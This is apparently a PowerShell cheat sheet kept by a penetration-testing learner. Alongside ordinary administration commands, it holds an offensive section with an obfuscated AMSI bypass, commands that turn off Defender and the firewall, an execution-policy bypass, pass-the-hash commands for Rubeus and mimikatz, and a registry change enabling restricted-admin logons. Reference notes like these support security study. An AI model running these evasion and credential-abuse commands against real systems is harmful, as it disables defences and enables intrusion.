
Powershell

Basic commands

# List users of Administrator group
net localgroup Administrators

# List contents (dir and gci are aliases of Get-ChildItem)
dir
gci
Get-ChildItem -Force
# -Force: also display hidden and system files

# Count files from a directory
(Get-ChildItem -File -Recurse | Measure-Object).Count

# Find files under the directory given by -Path whose name contains the string "cred"
Get-ChildItem -Recurse -Path N:\ -Include *cred* -File

# Print working directory
pwd
Get-Location

# Change directory
cd
cd ..                   # go up one level
cd ..\siblingdirectory  # go to a sibling directory
cd ~\Desktop            # go to the logged-on user's Desktop

# Creates folder
mkdir nameOfFolder
New-Item -ItemType Directory nameOfDirectory

# Display the commands entered in the current session (history is an alias of Get-History)
history
Get-History

# Browse the command history
CTRL-R

# Select-String: The `Select-String` cmdlet uses regular expression matching to search for text patterns in input strings and files. We can use `Select-String` similar to `grep` in UNIX or `findstr.exe` in Windows.
Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List



# Clear screen
clear
Clear-Host

# Copy item
cp nameOfSource nameOfDestination
Copy-Item nameOfSource nameOfDestination

# Copy a folder and its content
cp originFolder destinationPath -Recurse
Copy-Item originFolder destinationPath -Recurse

# Get running processes filtered by name
get-process -name ccSvcHst

# Kill processes whose image name starts with ccSvcHst (note the * wildcard)
taskkill /f /im ccSvcHst*

# Remove a file
rm nameofFile -Recurse
# -Recurse: Remove it recursively (in a folder)

# Display content of a file
cat nameofFile
Get-Content nameofFile

# Display one page of a file at a time
more nameofFile

# Display the first lines of a file (there is no built-in head; -TotalCount, alias -Head, does the job)
Get-Content nameofFile -TotalCount 10

# Open a file with an app
start nameofApp nameofFile

# Run a command or expression stored in a string on the local computer.
$Command = "Get-Process"
Invoke-Expression $Command
# Invoke-Expression evaluates the string as PowerShell code. Without it, $Command on its own
# just outputs the text "Get-Process". It is comparable to eval in a Unix shell.
# iex is its alias.


# Download content from a web page (here saved to a file).
Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1
# Alias: iwr. In Windows PowerShell 5.1 curl and wget are aliases too; PowerShell 6+ removed them.

Basic commands for reconnaissance and enumeration

System, users, permissions

# Display PowerShell version information
$PSVersionTable.PSVersion
$PSVersionTable


# You can tell if PowerShell is running with administrator privileges (a.k.a. "elevated" rights) with the following snippet:
[Security.Principal.WindowsIdentity]::GetCurrent().Groups -contains 'S-1-5-32-544'

# Step by step: GetCurrent() retrieves the WindowsIdentity of the user running the process.
[Security.Principal.WindowsIdentity]::GetCurrent()

# The Groups property of the identity lists the groups the identity is a member of.
[Security.Principal.WindowsIdentity]::GetCurrent().Groups

# -contains returns true if Groups holds the well-known SID of the Administrators group (the identity only contains it if "run as administrator" was used) and false otherwise.
[Security.Principal.WindowsIdentity]::GetCurrent().Groups -contains 'S-1-5-32-544'
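The snippet above assembled into one function, with the WindowsPrincipal role check as a cross-check. This is an added example, not part of the original notes; the function name and output property names are my own.

```powershell
# Added example: report whether the current PowerShell process is elevated.
function Test-IsElevated {
    $identity = [Security.Principal.WindowsIdentity]::GetCurrent()

    # With UAC, a local administrator who did not "run as administrator" has a
    # filtered token: the Administrators SID (S-1-5-32-544) is present only as a
    # deny-only entry, which the Groups property omits. So this answers
    # "is this process elevated?", not "is this user a local administrator?".
    $byGroupSid = $identity.Groups -contains 'S-1-5-32-544'

    # Same question asked through WindowsPrincipal; it honours the filtered token too.
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    $byRole    = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

    [pscustomobject]@{
        User       = $identity.Name
        Elevated   = $byGroupSid
        IsInRole   = $byRole
        ChecksAgree = ($byGroupSid -eq $byRole)   # expected to be $true on every host
    }
}

Test-IsElevated
```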

# List disabled users with LDAP
Get-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=2)' | select name

Processes

# List which processes are elevated. Heuristic that works from a non-elevated shell: a non-elevated
# process cannot read the Path or Handle of an elevated one, so both come back empty for it
# (access-denied errors may be printed along the way).
Get-Process | Add-Member -Name Elevated -MemberType ScriptProperty -Value {if ($this.Name -in @('Idle','System')) {$null} else {-not $this.Path -and -not $this.Handle} } -PassThru | Format-Table Name,Elevated

# List installed software on a computer
# (querying Win32_Product is slow and makes Windows Installer run a consistency check on every MSI package)
get-ciminstance win32_product | fl

Run a utility as another user

# Run a utility as another user with Rubeus, passing the credentials on the command line
rubeus.exe asktgt /user:jackie.may /domain:htb.local /dc:10.10.110.100 /rc4:ad11e823e1638def97afa7cb08156a94

# Run a utility as another user with mimikatz.exe, passing the credentials on the command line
mimikatz.exe sekurlsa::pth /domain:htb.local /user:jackie.may /rc4:ad11e823e1638def97afa7cb08156a94

Policies and antivirus

# Enumerate AppLocker policies 
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

# Quickly enumerate whether we are in Full Language Mode or Constrained Language Mode.
$ExecutionContext.SessionState.LanguageMode

# Check the current execution policy. If the answer is
# - "Restricted": PowerShell scripts cannot run.
# - "RemoteSigned": downloaded scripts must be signed by a trusted publisher.
Get-ExecutionPolicy

# Bypass execution policy
powershell -ep bypass

# Get the current Defender status.
Get-MpComputerStatus

# Deactivate antivirus from powershell session (if user has rights to do so)
Set-MpPreference -DisableRealtimeMonitoring $true

# Disable firewall
netsh advfirewall set allprofiles state off

# Bypass AMSI
**S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )**

# Add a registry value
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Connect to a share

# New-PSDrive connects a computer to a shared resource (a drive letter is mapped to the share)
New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem"

# Connect to a share with a username and password
$username = 'plaintext'
$password = 'Password123'
$secpassword = ConvertTo-SecureString $password -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential $username, $secpassword
New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem" -Credential $cred

Advanced queries in PowerShell

The four types of wildcards in PowerShell:

The * wildcard matches zero or more characters.

The ? wildcard matches exactly one character.

[m-n] matches one character in the range m to n, so [f-m]ake will match fake/jake/make.

[abc] matches one character from the set a, b, c..., so [fm]ake will match fake/make.

Filters

Filters are a way to power up our queries in PowerShell.

Example: the -Filter parameter of Get-CimInstance takes a WQL expression; with NOT ... LIKE we can filter out all Microsoft software (useful when enumerating a system for local privilege escalation vectors).

get-ciminstance win32_product -Filter "NOT Vendor like '%Microsoft%'" | fl

The -Filter parameter requires at least one operator:

Operator         Meaning
-eq              Equal to
-le              Less than or equal to
-ge              Greater than or equal to
-ne              Not equal to
-lt              Less than
-gt              Greater than
-approx          Approximately equal to
-bor             Bitwise OR
-band            Bitwise AND
-recursivematch  Recursive match
-like            Like
-notlike         Not like
-and             Boolean AND
-or              Boolean OR
-not             Boolean NOT

When using filters, certain characters must be escaped:

Character   Escaped as   Note
"           `"           Only needed if the data is enclosed in double quotes.
'           \'           Only needed if the data is enclosed in single quotes.
NUL         \00          Standard LDAP escape sequence.
\           \5c          Standard LDAP escape sequence.
*           \2a          Escaped automatically, but only in -eq and -ne comparisons. Use the -like and -notlike operators for wildcard comparison.
(           \28          Escaped automatically.
)           \29          Escaped automatically.
/           \2f          Escaped automatically.

Filter Examples: AD Object Properties

The filter can be used with operators to compare, exclude, search for, etc., a variety of AD object properties. Filters can be wrapped in curly braces, single quotes, parentheses, or double quotes. For example, the following simple search filter using Get-ADUser to find information about the user "Sally Jones" can be written as follows:

Get-ADUser -Filter "name -eq 'sally jones'"
Get-ADUser -Filter {name -eq 'sally jones'}
Get-ADUser -Filter 'name -eq "sally jones"'

As seen above, the property value (here, sally jones) can be wrapped in single or double-quotes.

# The asterisk (*) can be used as a wildcard when performing queries.
Get-ADUser -Filter {name -like "joe*"}
# Returns all domain users whose name starts with "joe" (joe, joel, etc.).
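Added example, not part of the original notes: the escape table and the wildcard list above applied in code. A value taken from untrusted input (a name containing a quote or a backslash) is escaped before it is placed in a single-quoted -Filter string, so it cannot break out of the value and change what the filter matches; the four wildcard forms are then checked locally with -like. Function and variable names are my own, and the names are constructed sample data.

```powershell
function ConvertTo-AdFilterValue {
    # Escape a value for use inside a single-quoted Get-ADUser -Filter string.
    param([Parameter(Mandatory)][string]$Value)
    # Backslash first, otherwise the backslashes inserted below would be escaped again.
    $escaped = $Value.Replace('\', '\5c')
    $escaped = $escaped.Replace([string][char]0, '\00')   # NUL
    $escaped = $escaped.Replace("'", "\'")                # value sits inside single quotes
    # ( ) / and * are escaped automatically in -eq / -ne comparisons, so they are left
    # alone; use -like / -notlike when * is meant as a wildcard.
    return $escaped
}

function New-AdNameFilter {
    # Build the filter string "name -eq '<escaped value>'".
    param([Parameter(Mandatory)][string]$Name)
    "name -eq '$(ConvertTo-AdFilterValue $Name)'"
}

# Constructed inputs: a plain name, a name with a quote, a name with a backslash.
foreach ($n in @('sally jones', "pat o'brien", 'dom\acct')) {
    '{0,-12} -> {1}' -f $n, (New-AdNameFilter $n)
}

# The four wildcard forms, evaluated locally with -like (the same syntax -Filter accepts).
$names = 'fake', 'jake', 'make', 'joe', 'joel', 'joseph'
$cases = [ordered]@{
    'j*'       = $names -like 'j*'        # zero or more characters: joe, joel, joseph
    'j?e'      = $names -like 'j?e'       # exactly one character:   joe
    '[f-m]ake' = $names -like '[f-m]ake'  # range:                   fake, jake, make
    '[fm]ake'  = $names -like '[fm]ake'   # set:                     fake, make
}
$cases.GetEnumerator() | ForEach-Object { '{0,-10} {1}' -f $_.Key, ($_.Value -join ', ') }

# Only query the directory when the ActiveDirectory module is actually available.
if (Get-Command Get-ADUser -ErrorAction SilentlyContinue) {
    Get-ADUser -Filter (New-AdNameFilter "pat o'brien") | Select-Object Name, SamAccountName
}
```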

Disk Management

# Show disks
Get-Disk

# Show disks as a more readable table
Get-Disk | FT -AutoSize

# Show partitions from a disk
Get-Partition -DiskNumber 1

# Create partition
New-Partition -DiskNumber 1 -Size 50GB -AssignDriveLetter

# Show volume
Get-volume -DriveLetter e

# Format the volume with the given file system
Format-Volume -DriveLetter E -FileSystem NTFS

# Delete Partition 
Remove-Partition -DriveLetter E

Disk Management with diskpart

Diskpart is a command interpreter that helps you manage your computer's disks, partitions and volumes. How it works: before using diskpart commands, you usually have to list and then select the object you want to operate on.

# To enter in diskpart command interpreter
diskpart

# Enumerate disk
list disk

# Select disk
select disk 0

# Enumerate volumes
list volume

# Select volume
select volume 1

# Enumerate partitions
list partition

# Select partition
select partition 2

# Extend a volume (once you have it selected)
extend size=2048

# Shrink a volume (once you have it selected)
shrink desired=2048

Howtos

How to delete shortcuts from Public Desktop

# Grant the chosen group full control of the Public Desktop so its shortcuts can be deleted.
# Instead of "Everyone" set the group you prefer: FullControl for Everyone lets any local
# account modify or drop files in a folder shown on every user's desktop.
$acl = Get-Acl "C:\Users\Public\Desktop"

$rule = New-Object System.Security.AccessControl.FileSystemAccessRule("Everyone", "FullControl", "ContainerInherit,ObjectInherit", "None", "Allow")

$acl.SetAccessRule($rule)

Set-Acl "C:\Users\Public\Desktop" $acl

How to uninstall WinZip from the PowerShell command line

# Show all software installed:
Get-WmiObject -Class win32_product

# Find the WinZip object
Get-WmiObject -Class win32_product | where { $_.Name -like "*Winzip*"}

# Store the object in a variable
$wzip = Get-WmiObject -Class win32_product | where { $_.Name -like "*Winzip*"}

# Uninstall it:
msiexec /x  $wzip.localpackage /passive

This starts the uninstallation of WinZip and shows only a progress bar, because we are using msiexec's /passive switch.

Last update: 2024-11-17
Created: January 1, 2023 21:59:36